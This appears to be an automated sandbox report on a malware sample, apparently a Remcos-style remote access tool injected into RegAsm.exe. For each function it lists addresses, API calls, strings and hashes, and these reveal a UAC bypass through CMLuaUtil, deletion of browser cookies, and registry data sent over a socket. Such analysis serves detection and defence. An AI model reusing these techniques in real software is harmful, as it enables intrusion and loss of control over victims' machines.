                                                                                                                                  Similarity
                                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1167301434-0
                                                                                                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                  Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                                                                  • String ID: a/p$am/pm$h{D
                                                                                                                                  • API String ID: 2936374016-2303565833
                                                                                                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                  Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                                                                  • _free.LIBCMT ref: 00444ED8
                                                                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID: KED
                                                                                                                                  • API String ID: 3033488037-2133951994
                                                                                                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                  Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Enum$InfoQueryValue
                                                                                                                                  • String ID: [regsplt]$xUG$TG
                                                                                                                                  • API String ID: 3554306468-1165877943
                                                                                                                                  • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                  • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                  Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                  • __fassign.LIBCMT ref: 0044B514
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                  Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                  • String ID: xUG$NG$NG$TG
                                                                                                                                  • API String ID: 3114080316-2811732169
                                                                                                                                  • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                  • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                  Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                  • String ID: .exe$8)3$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                  • API String ID: 3286818993-478932494
                                                                                                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                  Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                                  • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                  • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                  Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                  Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                                                                  • _free.LIBCMT ref: 00451032
                                                                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                                                                  • _free.LIBCMT ref: 00451048
                                                                                                                                  • _free.LIBCMT ref: 00451053
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                  Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                  Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                  • String ID: (mG
                                                                                                                                  • API String ID: 2536120697-4059303827
                                                                                                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                  Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                  Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                  • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                  • API String ID: 3851391207-1839356972
                                                                                                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                  Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                  Strings
                                                                                                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                  • UserProfile, xrefs: 0040BAE8
                                                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                  • API String ID: 2018770650-304995407
                                                                                                                                  • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                  • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                  Function 0040729B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • 8)3, xrefs: 004076D2
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                                                  • Rmc-IAW1Y3, xrefs: 00407715
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8)3$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-IAW1Y3
                                                                                                                                  • API String ID: 0-404744483
                                                                                                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
